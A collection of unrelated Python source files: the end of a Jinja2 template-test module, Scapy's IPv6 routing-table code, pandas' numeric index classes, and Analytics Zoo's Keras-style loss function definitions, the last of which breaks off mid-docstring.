assert tmpl.render() == "True|False"
def test_lower(self, env):
tmpl = env.from_string("""{{ "foo" is lower }}|{{ "FOO" is lower }}""")
assert tmpl.render() == "True|False"
# Test type checks
@pytest.mark.parametrize(
"op,expect",
(
("none is none", True),
("false is none", False),
("true is none", False),
("42 is none", False),
("none is true", False),
("false is true", False),
("true is true", True),
("0 is true", False),
("1 is true", False),
("42 is true", False),
("none is false", False),
("false is false", True),
("true is false", False),
("0 is false", False),
("1 is false", False),
("42 is false", False),
("none is boolean", False),
("false is boolean", True),
("true is boolean", True),
("0 is boolean", False),
("1 is boolean", False),
("42 is boolean", False),
("0.0 is boolean", False),
("1.0 is boolean", False),
("3.14159 is boolean", False),
("none is integer", False),
("false is integer", False),
("true is integer", False),
("42 is integer", True),
("3.14159 is integer", False),
("(10 ** 100) is integer", True),
("none is float", False),
("false is float", False),
("true is float", False),
("42 is float", False),
("4.2 is float", True),
("(10 ** 100) is float", False),
("none is number", False),
("false is number", True),
("true is number", True),
("42 is number", True),
("3.14159 is number", True),
("complex is number", True),
("(10 ** 100) is number", True),
("none is string", False),
("false is string", False),
("true is string", False),
("42 is string", False),
('"foo" is string', True),
("none is sequence", False),
("false is sequence", False),
("42 is sequence", False),
('"foo" is sequence', True),
("[] is sequence", True),
("[1, 2, 3] is sequence", True),
("{} is sequence", True),
("none is mapping", False),
("false is mapping", False),
("42 is mapping", False),
('"foo" is mapping', False),
("[] is mapping", False),
("{} is mapping", True),
("mydict is mapping", True),
("none is iterable", False),
("false is iterable", False),
("42 is iterable", False),
('"foo" is iterable', True),
("[] is iterable", True),
("{} is iterable", True),
("range(5) is iterable", True),
("none is callable", False),
("false is callable", False),
("42 is callable", False),
('"foo" is callable', False),
("[] is callable", False),
("{} is callable", False),
("range is callable", True),
),
)
def test_types(self, env, op, expect):
t = env.from_string(f"{{{{ {op} }}}}")
assert t.render(mydict=MyDict(), complex=complex(1, 2)) == str(expect)
def test_upper(self, env):
tmpl = env.from_string('{{ "FOO" is upper }}|{{ "foo" is upper }}')
assert tmpl.render() == "True|False"
def test_equalto(self, env):
tmpl = env.from_string(
"{{ foo is eq 12 }}|"
"{{ foo is eq 0 }}|"
"{{ foo is eq (3 * 4) }}|"
'{{ bar is eq "baz" }}|'
'{{ bar is eq "zab" }}|'
'{{ bar is eq ("ba" + "z") }}|'
"{{ bar is eq bar }}|"
"{{ bar is eq foo }}"
)
assert (
tmpl.render(foo=12, bar="baz")
== "True|False|True|True|False|True|True|False"
)
@pytest.mark.parametrize(
"op,expect",
(
("eq 2", True),
("eq 3", False),
("ne 3", True),
("ne 2", False),
("lt 3", True),
("lt 2", False),
("le 2", True),
("le 1", False),
("gt 1", True),
("gt 2", False),
("ge 2", True),
("ge 3", False),
),
)
def test_compare_aliases(self, env, op, expect):
t = env.from_string(f"{{{{ 2 is {op} }}}}")
assert t.render() == str(expect)
def test_sameas(self, env):
tmpl = env.from_string("{{ foo is sameas false }}|{{ 0 is sameas false }}")
assert tmpl.render(foo=False) == "True|False"
def test_no_paren_for_arg1(self, env):
tmpl = env.from_string("{{ foo is sameas none }}")
assert tmpl.render(foo=None) == "True"
def test_escaped(self, env):
env = Environment(autoescape=True)
tmpl = env.from_string("{{ x is escaped }}|{{ y is escaped }}")
assert tmpl.render(x="foo", y=Markup("foo")) == "False|True"
def test_greaterthan(self, env):
tmpl = env.from_string("{{ 1 is greaterthan 0 }}|{{ 0 is greaterthan 1 }}")
assert tmpl.render() == "True|False"
def test_lessthan(self, env):
tmpl = env.from_string("{{ 0 is lessthan 1 }}|{{ 1 is lessthan 0 }}")
assert tmpl.render() == "True|False"
def test_multiple_tests(self):
items = []
def matching(x, y):
items.append((x, y))
return False
env = Environment()
env.tests["matching"] = matching
tmpl = env.from_string(
"{{ 'us-west-1' is matching '(us-east-1|ap-northeast-1)'"
" or 'stage' is matching '(dev|stage)' }}"
)
assert tmpl.render() == "False"
assert items == [
("us-west-1", "(us-east-1|ap-northeast-1)"),
("stage", "(dev|stage)"),
]
def test_in(self, env):
tmpl = env.from_string(
'{{ "o" is in "foo" }}|'
'{{ "foo" is in "foo" }}|'
'{{ "b" is in "foo" }}|'
"{{ 1 is in ((1, 2)) }}|"
"{{ 3 is in ((1, 2)) }}|"
"{{ 1 is in [1, 2] }}|"
"{{ 3 is in [1, 2] }}|"
'{{ "foo" is in {"foo": 1}}}|'
'{{ "baz" is in {"bar": 1}}}'
)
assert tmpl.render() == "True|True|False|True|False|True|False|True|False"
def test_name_undefined(env):
with pytest.raises(TemplateAssertionError, match="No test named 'f'"):
env.from_string("{{ x is f }}")
def test_name_undefined_in_if(env):
t = env.from_string("{% if x is defined %}{{ x is f }}{% endif %}")
assert t.render() == ""
with pytest.raises(TemplateRuntimeError, match="No test named 'f'"):
t.render(x=1)
def test_is_filter(env):
assert env.call_test("filter", "title")
assert not env.call_test("filter", "bad-name")
def test_is_test(env):
assert env.call_test("test", "number")
assert not env.call_test("test", "bad-name")
|
|
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <[email protected]>
## This program is published under a GPLv2 license
## Copyright (C) 2005 Guillaume Valadon <[email protected]>
## Arnaud Ebalard <[email protected]>
"""
Routing and network interface handling for IPv6.
"""
#############################################################################
#############################################################################
### Routing/Interfaces stuff ###
#############################################################################
#############################################################################
import socket
from config import conf
from utils6 import *
from arch import *
class Route6:
def __init__(self):
self.invalidate_cache()
self.resync()
def invalidate_cache(self):
self.cache = {}
def flush(self):
self.invalidate_cache()
self.routes = []
def resync(self):
# TODO : At the moment, resync will drop existing Teredo routes
# if any. Change that ...
self.invalidate_cache()
self.routes = read_routes6()
if self.routes == []:
log_loading.info("No IPv6 support in kernel")
def __repr__(self):
rtlst = [('Destination', 'Next Hop', "iface", "src candidates")]
for net,msk,gw,iface,cset in self.routes:
rtlst.append(('%s/%i'% (net,msk), gw, iface, ", ".join(cset)))
colwidth = map(lambda x: max(map(lambda y: len(y), x)), apply(zip, rtlst))
fmt = " ".join(map(lambda x: "%%-%ds"%x, colwidth))
rt = "\n".join(map(lambda x: fmt % x, rtlst))
return rt
# Unlike Scapy's Route.make_route() function, we do not have 'host' and 'net'
# parameters. We only have a 'dst' parameter that accepts 'prefix' and
# 'prefix/prefixlen' values.
# WARNING: Providing a specific device will at the moment not work correctly.
def make_route(self, dst, gw=None, dev=None):
"""Internal function : create a route for 'dst' via 'gw'.
"""
prefix, plen = (dst.split("/")+["128"])[:2]
plen = int(plen)
if gw is None:
gw = "::"
if dev is None:
dev, ifaddr, x = self.route(gw)
else:
# TODO: do better than that
# replace that unique address by the list of all addresses
lifaddr = in6_getifaddr()
devaddrs = filter(lambda x: x[2] == dev, lifaddr)
ifaddr = construct_source_candidate_set(prefix, plen, devaddrs, LOOPBACK_NAME)
return (prefix, plen, gw, dev, ifaddr)
def add(self, *args, **kargs):
"""Ex:
add(dst="2001:db8:cafe:f000::/56")
add(dst="2001:db8:cafe:f000::/56", gw="2001:db8:cafe::1")
add(dst="2001:db8:cafe:f000::/64", gw="2001:db8:cafe::1", dev="eth0")
"""
self.invalidate_cache()
self.routes.append(self.make_route(*args, **kargs))
def delt(self, dst, gw=None):
""" Ex:
delt(dst="::/0")
delt(dst="2001:db8:cafe:f000::/56")
delt(dst="2001:db8:cafe:f000::/56", gw="2001:db8:deca::1")
"""
tmp = dst+"/128"
dst, plen = tmp.split('/')[:2]
dst = in6_ptop(dst)
plen = int(plen)
l = filter(lambda x: in6_ptop(x[0]) == dst and x[1] == plen, self.routes)
if gw:
gw = in6_ptop(gw)
l = filter(lambda x: in6_ptop(x[0]) == gw, self.routes)
if len(l) == 0:
warning("No matching route found")
elif len(l) > 1:
warning("Found more than one match. Aborting.")
else:
i=self.routes.index(l[0])
self.invalidate_cache()
del(self.routes[i])
def ifchange(self, iff, addr):
the_addr, the_plen = (addr.split("/")+["128"])[:2]
the_plen = int(the_plen)
naddr = inet_pton(socket.AF_INET6, the_addr)
nmask = in6_cidr2mask(the_plen)
the_net = inet_ntop(socket.AF_INET6, in6_and(nmask,naddr))
for i, route in enumerate(self.routes):
net,plen,gw,iface,addr = route
if iface != iff:
continue
if gw == '::':
self.routes[i] = (the_net,the_plen,gw,iface,the_addr)
else:
self.routes[i] = (net,the_plen,gw,iface,the_addr)
self.invalidate_cache()
ip6_neigh_cache.flush()
def ifdel(self, iff):
""" removes all route entries that uses 'iff' interface. """
new_routes=[]
for rt in self.routes:
if rt[3] != iff:
new_routes.append(rt)
self.invalidate_cache()
self.routes = new_routes
def ifadd(self, iff, addr):
"""
Add an interface 'iff' with provided address into routing table.
Ex: ifadd('eth0', '2001:bd8:cafe:1::1/64') will add following entry into
Scapy6 internal routing table:
Destination Next Hop iface Def src @
2001:bd8:cafe:1::/64 :: eth0 2001:bd8:cafe:1::1
prefix length value can be omitted. In that case, a value of 128
will be used.
"""
addr, plen = (addr.split("/")+["128"])[:2]
addr = in6_ptop(addr)
plen = int(plen)
naddr = inet_pton(socket.AF_INET6, addr)
nmask = in6_cidr2mask(plen)
prefix = inet_ntop(socket.AF_INET6, in6_and(nmask,naddr))
self.invalidate_cache()
self.routes.append((prefix,plen,'::',iff,[addr]))
def route(self, dst, dev=None):
"""
Provide best route to IPv6 destination address, based on Scapy6
internal routing table content.
When a set of address is passed (e.g. 2001:db8:cafe:*::1-5) an address
of the set is used. Be aware of that behavior when using wildcards in
upper parts of addresses !
If 'dst' parameter is a FQDN, name resolution is performed and result
is used.
if optional 'dev' parameter is provided a specific interface, filtering
is performed to limit search to route associated to that interface.
"""
# Transform "2001:db8:cafe:*::1-5:0/120" to one IPv6 address of the set
dst = dst.split("/")[0]
savedst = dst # In case following inet_pton() fails
dst = dst.replace("*","0")
l = dst.find("-")
while l >= 0:
m = (dst[l:]+":").find(":")
dst = dst[:l]+dst[l+m:]
l = dst.find("-")
try:
inet_pton(socket.AF_INET6, dst)
except socket.error:
dst = socket.getaddrinfo(savedst, None, socket.AF_INET6)[0][-1][0]
# TODO : Check if name resolution went well
# Deal with dev-specific request for cache search
k = dst
if dev is not None:
k = dst + "%%" + dev
if k in self.cache:
return self.cache[k]
pathes = []
# TODO : review all kinds of addresses (scope and *cast) to see
# if we are able to cope with everything possible. I'm convinced
# it's not the case.
# -- arnaud
for p, plen, gw, iface, cset in self.routes:
if dev is not None and iface != dev:
continue
if in6_isincluded(dst, p, plen):
pathes.append((plen, (iface, cset, gw)))
elif (in6_ismlladdr(dst) and in6_islladdr(p) and in6_islladdr(cset[0])):
pathes.append((plen, (iface, cset, gw)))
if not pathes:
warning("No route found for IPv6 destination %s (no default route?)" % dst)
return (LOOPBACK_NAME, "::", "::") # XXX Linux specific
# Sort with longest prefix first
pathes.sort(reverse=True)
best_plen = pathes[0][0]
pathes = filter(lambda x: x[0] == best_plen, pathes)
res = []
for p in pathes: # Here we select best source address for every route
tmp = p[1]
srcaddr = get_source_addr_from_candidate_set(dst, p[1][1])
if srcaddr is not None:
res.append((p[0], (tmp[0], srcaddr, tmp[2])))
if res == []:
warning("Found a route for IPv6 destination '%s', but no possible source address." % dst)
return (LOOPBACK_NAME, "::", "::") # XXX Linux specific
# Symptom : 2 routes with same weight (our weight is plen)
# Solution :
# - dst is unicast global. Check if it is 6to4 and we have a source
# 6to4 address in those available
# - dst is link local (unicast or multicast) and multiple output
# interfaces are available. Take main one (conf.iface6)
# - if none of the previous or ambiguity persists, be lazy and keep
# first one
# XXX TODO : in a _near_ future, include metric in the game
if len(res) > 1:
tmp = []
if in6_isgladdr(dst) and in6_isaddr6to4(dst):
# TODO : see if taking the longest match between dst and
# every source addresses would provide better results
tmp = filter(lambda x: in6_isaddr6to4(x[1][1]), res)
elif in6_ismaddr(dst) or in6_islladdr(dst):
# TODO : I'm sure we are not covering all addresses. Check that
tmp = filter(lambda x: x[1][0] == conf.iface6, res)
if tmp:
res = tmp
# Fill the cache (including dev-specific request)
k = dst
if dev is not None:
k = dst + "%%" + dev
self.cache[k] = res[0][1]
return res[0][1]
conf.route6 = Route6()
_res = conf.route6.route("::/0")
if _res:
iff, gw, addr = _res
conf.iface6 = iff
del(_res)
|
|
from typing import Any
import numpy as np
from pandas._libs import index as libindex, lib
from pandas._typing import Dtype, Label
from pandas.util._decorators import cache_readonly, doc
from pandas.core.dtypes.cast import astype_nansafe
from pandas.core.dtypes.common import (
is_bool,
is_bool_dtype,
is_dtype_equal,
is_extension_array_dtype,
is_float,
is_float_dtype,
is_integer_dtype,
is_scalar,
is_signed_integer_dtype,
is_unsigned_integer_dtype,
needs_i8_conversion,
pandas_dtype,
)
from pandas.core.dtypes.generic import (
ABCFloat64Index,
ABCInt64Index,
ABCRangeIndex,
ABCSeries,
ABCUInt64Index,
)
from pandas.core.dtypes.missing import isna
from pandas.core import algorithms
import pandas.core.common as com
from pandas.core.indexes.base import Index, maybe_extract_name
from pandas.core.ops import get_op_result_name
_num_index_shared_docs = dict()
class NumericIndex(Index):
"""
Provide numeric type operations.
This is an abstract class.
"""
_is_numeric_dtype = True
def __new__(cls, data=None, dtype=None, copy=False, name=None):
cls._validate_dtype(dtype)
name = maybe_extract_name(name, data, cls)
# Coerce to ndarray if not already ndarray or Index
if not isinstance(data, (np.ndarray, Index)):
if is_scalar(data):
raise cls._scalar_data_error(data)
# other iterable of some kind
if not isinstance(data, (ABCSeries, list, tuple)):
data = list(data)
data = np.asarray(data, dtype=dtype)
if issubclass(data.dtype.type, str):
cls._string_data_error(data)
if copy or not is_dtype_equal(data.dtype, cls._default_dtype):
subarr = np.array(data, dtype=cls._default_dtype, copy=copy)
cls._assert_safe_casting(data, subarr)
else:
subarr = data
if subarr.ndim > 1:
# GH#13601, GH#20285, GH#27125
raise ValueError("Index data must be 1-dimensional")
subarr = np.asarray(subarr)
return cls._simple_new(subarr, name=name)
@classmethod
def _validate_dtype(cls, dtype: Dtype) -> None:
if dtype is None:
return
validation_metadata = {
"int64index": (is_signed_integer_dtype, "signed integer"),
"uint64index": (is_unsigned_integer_dtype, "unsigned integer"),
"float64index": (is_float_dtype, "float"),
"rangeindex": (is_signed_integer_dtype, "signed integer"),
}
validation_func, expected = validation_metadata[cls._typ]
if not validation_func(dtype):
raise ValueError(
f"Incorrect `dtype` passed: expected {expected}, received {dtype}"
)
@doc(Index._maybe_cast_slice_bound)
def _maybe_cast_slice_bound(self, label, side, kind):
assert kind in ["loc", "getitem", None]
# we will try to coerce to integers
return self._maybe_cast_indexer(label)
@doc(Index._shallow_copy)
def _shallow_copy(self, values=None, name: Label = lib.no_default):
if values is not None and not self._can_hold_na and values.dtype.kind == "f":
name = self.name if name is lib.no_default else name
# Ensure we are not returning an Int64Index with float data:
return Float64Index._simple_new(values, name=name)
return super()._shallow_copy(values=values, name=name)
def _convert_for_op(self, value):
"""
Convert value to be insertable to ndarray.
"""
if is_bool(value) or is_bool_dtype(value):
# force conversion to object
# so we don't lose the bools
raise TypeError
return value
def _convert_tolerance(self, tolerance, target):
tolerance = np.asarray(tolerance)
if target.size != tolerance.size and tolerance.size > 1:
raise ValueError("list-like tolerance size must match target index size")
if not np.issubdtype(tolerance.dtype, np.number):
if tolerance.ndim > 0:
raise ValueError(
f"tolerance argument for {type(self).__name__} must contain "
"numeric elements if it is list type"
)
else:
raise ValueError(
f"tolerance argument for {type(self).__name__} must be numeric "
f"if it is a scalar: {repr(tolerance)}"
)
return tolerance
@classmethod
def _assert_safe_casting(cls, data, subarr):
"""
Subclasses need to override this only if the process of casting data
from some accepted dtype to the internal dtype(s) bears the risk of
truncation (e.g. float to int).
"""
pass
@property
def is_all_dates(self) -> bool:
"""
Checks that all the labels are datetime objects.
"""
return False
@doc(Index.insert)
def insert(self, loc: int, item):
# treat NA values as nans:
if is_scalar(item) and isna(item):
item = self._na_value
return super().insert(loc, item)
def _union(self, other, sort):
# Right now, we treat union(int, float) a bit special.
# See https://github.com/pandas-dev/pandas/issues/26778 for discussion
# We may change union(int, float) to go to object.
# float | [u]int -> float (the special case)
# <T> | <T> -> T
# <T> | <U> -> object
needs_cast = (is_integer_dtype(self.dtype) and is_float_dtype(other.dtype)) or (
is_integer_dtype(other.dtype) and is_float_dtype(self.dtype)
)
if needs_cast:
first = self.astype("float")
second = other.astype("float")
return first._union(second, sort)
else:
return super()._union(other, sort)
_num_index_shared_docs[
"class_descr"
] = """
Immutable ndarray implementing an ordered, sliceable set. The basic object
storing axis labels for all pandas objects. %(klass)s is a special case
of `Index` with purely %(ltype)s labels. %(extra)s.
Parameters
----------
data : array-like (1-dimensional)
dtype : NumPy dtype (default: %(dtype)s)
copy : bool
Make a copy of input ndarray.
name : object
Name to be stored in the index.
Attributes
----------
None
Methods
-------
None
See Also
--------
Index : The base pandas Index type.
Notes
-----
An Index instance can **only** contain hashable objects.
"""
_int64_descr_args = dict(klass="Int64Index", ltype="integer", dtype="int64", extra="")
class IntegerIndex(NumericIndex):
"""
This is an abstract class for Int64Index, UInt64Index.
"""
_default_dtype: np.dtype
def __contains__(self, key) -> bool:
"""
Check if key is a float and has a decimal. If it has, return False.
"""
hash(key)
try:
if is_float(key) and int(key) != key:
return False
return key in self._engine
except (OverflowError, TypeError, ValueError):
return False
@property
def inferred_type(self) -> str:
"""
Always 'integer' for ``Int64Index`` and ``UInt64Index``
"""
return "integer"
@property
def asi8(self) -> np.ndarray:
# do not cache or you'll create a memory leak
return self._values.view(self._default_dtype)
class Int64Index(IntegerIndex):
__doc__ = _num_index_shared_docs["class_descr"] % _int64_descr_args
_typ = "int64index"
_can_hold_na = False
_engine_type = libindex.Int64Engine
_default_dtype = np.dtype(np.int64)
def _wrap_joined_index(self, joined, other):
name = get_op_result_name(self, other)
return Int64Index(joined, name=name)
@classmethod
def _assert_safe_casting(cls, data, subarr):
"""
Ensure incoming data can be represented as ints.
"""
if not issubclass(data.dtype.type, np.signedinteger):
if not np.array_equal(data, subarr):
raise TypeError("Unsafe NumPy casting, you must explicitly cast")
def _is_compatible_with_other(self, other) -> bool:
return super()._is_compatible_with_other(other) or all(
isinstance(obj, (ABCInt64Index, ABCFloat64Index, ABCRangeIndex))
for obj in [self, other]
)
Int64Index._add_numeric_methods()
Int64Index._add_logical_methods()
_uint64_descr_args = dict(
klass="UInt64Index", ltype="unsigned integer", dtype="uint64", extra=""
)
class UInt64Index(IntegerIndex):
__doc__ = _num_index_shared_docs["class_descr"] % _uint64_descr_args
_typ = "uint64index"
_can_hold_na = False
_engine_type = libindex.UInt64Engine
_default_dtype = np.dtype(np.uint64)
@doc(Index._convert_arr_indexer)
def _convert_arr_indexer(self, keyarr):
# Cast the indexer to uint64 if possible so that the values returned
# from indexing are also uint64.
dtype = None
if is_integer_dtype(keyarr) or (
lib.infer_dtype(keyarr, skipna=False) == "integer"
):
dtype = np.uint64
return com.asarray_tuplesafe(keyarr, dtype=dtype)
@doc(Index._convert_index_indexer)
def _convert_index_indexer(self, keyarr):
# Cast the indexer to uint64 if possible so
# that the values returned from indexing are
# also uint64.
if keyarr.is_integer():
return keyarr.astype(np.uint64)
return keyarr
def _wrap_joined_index(self, joined, other):
name = get_op_result_name(self, other)
return UInt64Index(joined, name=name)
@classmethod
def _assert_safe_casting(cls, data, subarr):
"""
Ensure incoming data can be represented as uints.
"""
if not issubclass(data.dtype.type, np.unsignedinteger):
if not np.array_equal(data, subarr):
raise TypeError("Unsafe NumPy casting, you must explicitly cast")
def _is_compatible_with_other(self, other) -> bool:
return super()._is_compatible_with_other(other) or all(
isinstance(obj, (ABCUInt64Index, ABCFloat64Index)) for obj in [self, other]
)
UInt64Index._add_numeric_methods()
UInt64Index._add_logical_methods()
_float64_descr_args = dict(
klass="Float64Index", dtype="float64", ltype="float", extra=""
)
class Float64Index(NumericIndex):
__doc__ = _num_index_shared_docs["class_descr"] % _float64_descr_args
_typ = "float64index"
_engine_type = libindex.Float64Engine
_default_dtype = np.float64
@property
def inferred_type(self) -> str:
"""
Always 'floating' for ``Float64Index``
"""
return "floating"
@doc(Index.astype)
def astype(self, dtype, copy=True):
dtype = pandas_dtype(dtype)
if needs_i8_conversion(dtype):
raise TypeError(
f"Cannot convert Float64Index to dtype {dtype}; integer "
"values are required for conversion"
)
elif is_integer_dtype(dtype) and not is_extension_array_dtype(dtype):
# TODO(jreback); this can change once we have an EA Index type
# GH 13149
arr = astype_nansafe(self._values, dtype=dtype)
return Int64Index(arr, name=self.name)
return super().astype(dtype, copy=copy)
# ----------------------------------------------------------------
# Indexing Methods
@doc(Index._should_fallback_to_positional)
def _should_fallback_to_positional(self) -> bool:
return False
@doc(Index._convert_slice_indexer)
def _convert_slice_indexer(self, key: slice, kind: str):
assert kind in ["loc", "getitem"]
# We always treat __getitem__ slicing as label-based
# translate to locations
return self.slice_indexer(key.start, key.stop, key.step, kind=kind)
# ----------------------------------------------------------------
def _format_native_types(
self, na_rep="", float_format=None, decimal=".", quoting=None, **kwargs
):
from pandas.io.formats.format import FloatArrayFormatter
formatter = FloatArrayFormatter(
self._values,
na_rep=na_rep,
float_format=float_format,
decimal=decimal,
quoting=quoting,
fixed_width=False,
)
return formatter.get_result_as_array()
def equals(self, other) -> bool:
"""
Determines if two Index objects contain the same elements.
"""
if self is other:
return True
if not isinstance(other, Index):
return False
# need to compare nans locations and make sure that they are the same
# since nans don't compare equal this is a bit tricky
try:
if not isinstance(other, Float64Index):
other = self._constructor(other)
if not is_dtype_equal(self.dtype, other.dtype) or self.shape != other.shape:
return False
left, right = self._values, other._values
return ((left == right) | (self._isnan & other._isnan)).all()
except (TypeError, ValueError):
return False
def __contains__(self, other: Any) -> bool:
hash(other)
if super().__contains__(other):
return True
return is_float(other) and np.isnan(other) and self.hasnans
@doc(Index.get_loc)
def get_loc(self, key, method=None, tolerance=None):
if is_bool(key):
# Catch this to avoid accidentally casting to 1.0
raise KeyError(key)
if is_float(key) and np.isnan(key):
nan_idxs = self._nan_idxs
if not len(nan_idxs):
raise KeyError(key)
elif len(nan_idxs) == 1:
return nan_idxs[0]
return nan_idxs
return super().get_loc(key, method=method, tolerance=tolerance)
@cache_readonly
def is_unique(self) -> bool:
return super().is_unique and self._nan_idxs.size < 2
@doc(Index.isin)
def isin(self, values, level=None):
if level is not None:
self._validate_index_level(level)
return algorithms.isin(np.array(self), values)
def _is_compatible_with_other(self, other) -> bool:
return super()._is_compatible_with_other(other) or all(
isinstance(
obj, (ABCInt64Index, ABCFloat64Index, ABCUInt64Index, ABCRangeIndex),
)
for obj in [self, other]
)
Float64Index._add_numeric_methods()
Float64Index._add_logical_methods_disabled()
|
|
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from zoo.pipeline.api.keras.base import ZooKerasCreator
from bigdl.nn.criterion import Criterion
from bigdl.util.common import JTensor
if sys.version >= '3':
long = int
unicode = str
class LossFunction(ZooKerasCreator, Criterion):
"""
The base class for Keras-style API objectives in Analytics Zoo.
"""
def __init__(self, jvalue, bigdl_type, *args):
super(Criterion, self).__init__(jvalue, bigdl_type, *args)
@classmethod
def of(cls, jloss, bigdl_type="float"):
"""
Create a Python LossFunction from a JavaObject.
# Arguments
jloss: A java criterion object which created by Py4j
"""
loss = LossFunction(bigdl_type, jloss)
loss.value = jloss
loss.bigdl_type = bigdl_type
return loss
class SparseCategoricalCrossEntropy(LossFunction):
"""
A loss often used in multi-class classification problems with SoftMax
as the last layer of the neural network.
By default, same as Keras, input(y_pred) is supposed to be probabilities of each class,
and target(y_true) is supposed to be the class label starting from 0.
# Arguments
log_prob_as_input: Boolean. Whether to accept log-probabilities or probabilities
as input. Default is False and inputs should be probabilities.
zero_based_label: Boolean. Whether target labels start from 0. Default is True.
If False, labels start from 1.
weights: A Numpy array. Weights of each class if you have an unbalanced training set.
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
padding_value: Int. If the target is set to this value, the training process
will skip this sample. In other words, the forward process will
return zero output and the backward process will also return
zero grad_input. Default is -1.
>>> loss = SparseCategoricalCrossEntropy()
creating: createZooKerasSparseCategoricalCrossEntropy
>>> import numpy as np
>>> np.random.seed(1128)
>>> weights = np.random.uniform(0, 1, (2,)).astype("float32")
>>> loss = SparseCategoricalCrossEntropy(weights=weights)
creating: createZooKerasSparseCategoricalCrossEntropy
"""
def __init__(self, log_prob_as_input=False, zero_based_label=True,
weights=None, size_average=True, padding_value=-1, bigdl_type="float"):
super(SparseCategoricalCrossEntropy, self).__init__(None, bigdl_type,
log_prob_as_input,
zero_based_label,
JTensor.from_ndarray(weights),
size_average,
padding_value)
class MeanAbsoluteError(LossFunction):
"""
A loss that measures the mean absolute value of the element-wise difference
between the input and the target.
# Arguments
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
>>> loss = MeanAbsoluteError()
creating: createZooKerasMeanAbsoluteError
"""
def __init__(self, size_average=True, bigdl_type="float"):
super(MeanAbsoluteError, self).__init__(None, bigdl_type,
size_average)
mae = MAE = MeanAbsoluteError
class BinaryCrossEntropy(LossFunction):
"""
A loss that measures the Binary Cross Entropy between the target and the output
# Arguments
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
weights: weights over the input dimension
>>> loss = BinaryCrossEntropy()
creating: createZooKerasBinaryCrossEntropy
"""
def __init__(self, weights=None, size_average=True, bigdl_type="float"):
super(BinaryCrossEntropy, self).__init__(None, bigdl_type,
JTensor.from_ndarray(weights),
size_average)
class CategoricalCrossEntropy(LossFunction):
"""
This is same with cross entropy criterion, except the target tensor is a one-hot tensor
>>> loss = CategoricalCrossEntropy()
creating: createZooKerasCategoricalCrossEntropy
"""
def __init__(self, bigdl_type="float"):
super(CategoricalCrossEntropy, self).__init__(None, bigdl_type)
class CosineProximity(LossFunction):
"""
The negative of the mean cosine proximity between predictions and targets.
The cosine proximity is defined as below:
x'(i) = x(i) / sqrt(max(sum(x(i)^2), 1e-12))
y'(i) = y(i) / sqrt(max(sum(x(i)^2), 1e-12))
cosine_proximity(x, y) = mean(-1 * x'(i) * y'(i))
>>> loss = CosineProximity()
creating: createZooKerasCosineProximity
"""
def __init__(self, bigdl_type="float"):
super(CosineProximity, self).__init__(None, bigdl_type)
class Hinge(LossFunction):
"""
Creates a criterion that optimizes a two-class classification
hinge loss (margin-based loss) between input x (a Tensor of dimension 1) and output y.
# Arguments:
margin: Float. Default is 1.0.
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
>>> loss = Hinge()
creating: createZooKerasHinge
"""
def __init__(self, margin=1.0, size_average=True, bigdl_type="float"):
super(Hinge, self).__init__(None, bigdl_type, float(margin), size_average)
class KullbackLeiblerDivergence(LossFunction):
"""
Loss calculated as:y_true = K.clip(y_true, K.epsilon(), 1)
y_pred = K.clip(y_pred, K.epsilon(), 1)
and output K.sum(y_true * K.log(y_true / y_pred), axis=-1)
>>> loss = KullbackLeiblerDivergence()
creating: createZooKerasKullbackLeiblerDivergence
"""
def __init__(self, bigdl_type="float"):
super(KullbackLeiblerDivergence, self).__init__(None, bigdl_type)
class MeanAbsolutePercentageError(LossFunction):
"""
It caculates diff = K.abs((y - x) / K.clip(K.abs(y), K.epsilon(), Double.MaxValue))
and return 100 * K.mean(diff) as outpout
>>> loss = MeanAbsolutePercentageError()
creating: createZooKerasMeanAbsolutePercentageError
"""
def __init__(self, bigdl_type="float"):
super(MeanAbsolutePercentageError, self).__init__(None, bigdl_type)
mape = MAPE = MeanAbsolutePercentageError
class MeanSquaredError(LossFunction):
"""
A loss that measures the mean squared value of the element-wise difference
between the input and the target.
# Arguments
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
>>> loss = MeanSquaredError()
creating: createZooKerasMeanSquaredError
"""
def __init__(self, size_average=True, bigdl_type="float"):
super(MeanSquaredError, self).__init__(None, bigdl_type,
size_average)
mse = MSE = MeanSquaredError
class MeanSquaredLogarithmicError(LossFunction):
"""
It calculates:
first_log = K.log(K.clip(y, K.epsilon(), Double.MaxValue) + 1.)
second_log = K.log(K.clip(x, K.epsilon(), Double.MaxValue) + 1.)
and output K.mean(K.square(first_log - second_log))
>>> loss = MeanSquaredLogarithmicError()
creating: createZooKerasMeanSquaredLogarithmicError
"""
def __init__(self, bigdl_type="float"):
super(MeanSquaredLogarithmicError, self).__init__(None, bigdl_type)
msle = MSLE = MeanSquaredLogarithmicError
class Poisson(LossFunction):
"""
Loss calculated as: K.mean(y_pred - y_true * K.log(y_pred + K.epsilon()), axis=-1)
>>> loss = Poisson()
creating: createZooKerasPoisson
"""
def __init__(self, bigdl_type="float"):
super(Poisson, self).__init__(None, bigdl_type)
class SquaredHinge(LossFunction):
"""
Creates a criterion that optimizes a two-class classification
squared hinge loss (margin-based loss)
between input x (a Tensor of dimension 1) and output y.
# Arguments:
margin: Float. Default is 1.0.
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
>>> loss = SquaredHinge()
creating: createZooKerasSquaredHinge
"""
def __init__(self, margin=1.0, size_average=False, bigdl_type="float"):
super(SquaredHinge, self).__init__(None, bigdl_type, float(margin), size_average)
class RankHinge(LossFunction):
"""
Hinge loss for pairwise ranking problems.
# Arguments:
margin: Float. Default is 1.0.
